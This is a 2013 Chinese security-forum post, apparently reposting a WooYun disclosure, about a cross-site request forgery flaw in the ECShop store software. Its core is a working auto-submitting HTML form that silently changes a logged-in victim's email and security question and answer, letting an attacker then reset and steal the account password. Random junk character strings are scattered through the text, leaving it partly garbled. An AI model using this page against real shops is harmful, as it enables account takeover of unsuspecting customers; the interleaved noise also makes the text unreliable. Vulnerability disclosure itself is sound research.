找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1941|回复: 0
打印 上一主题 下一主题

ecshop修改任意用户密码漏洞的CSRF利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-20 08:30:14 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
" y: \5 f6 E' gecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现
% }$ W" U" z5 f5 @1 y0 i; V
& b9 }. {1 v$ Y& E" Y  QDemo For:http://www.wooyun.org/bug.php?action=view&id=395
2 T8 R, N1 \$ R' H" c+ u2 K. l2 Q+ A7 Z9 `% P
详细说明:+ w$ F& x" p4 ]5 ]- l
利用csrf和xss可以突破官方所说的“障碍”
4 d( ~$ Y$ V2 O3 S# C! G8 bxss版本已经有人说明: k+ B1 ^4 S, E' v- H5 `
这里给出csrf版本6 B& C# r* E/ K/ {+ \) x7 \- X
) c- E& z  |9 _! D" E
漏洞证明:9 M0 L6 s  N: ~
<html>/ k6 B4 e1 ^& {+ d% w7 V
<body>" @+ k+ {; I, ?0 B( R4 B3 v
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">
, L# V; }9 h, a5 }! ?1 M: h<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">! P5 W  \$ x7 e& X, Q* z7 L
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
1 e% \  i  ]- N; V6 `, L- _<INPUT TYPE="text" NAME="sel_question" value="ecshop">
" K  i  g7 o: I0 J" C! J; u3 ]6 w6 L<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
: V2 r  v) u# H6 R/ W) b</body>8 o* q1 V/ ]; ^( \: y; b- m2 G
<script>3 y+ T$ a0 }$ N( |) v
document.forms[0].submit();! @' V" J1 u( P
</script>
: V/ t7 ^+ _" w1 M8 T" D( F3 Q" c9 [</html>
+ }9 D! q+ \. y/ r" }4 ^0 [! I构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失. X, o9 Q# b5 h5 S9 k
6 t% U+ s. `; C; d
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表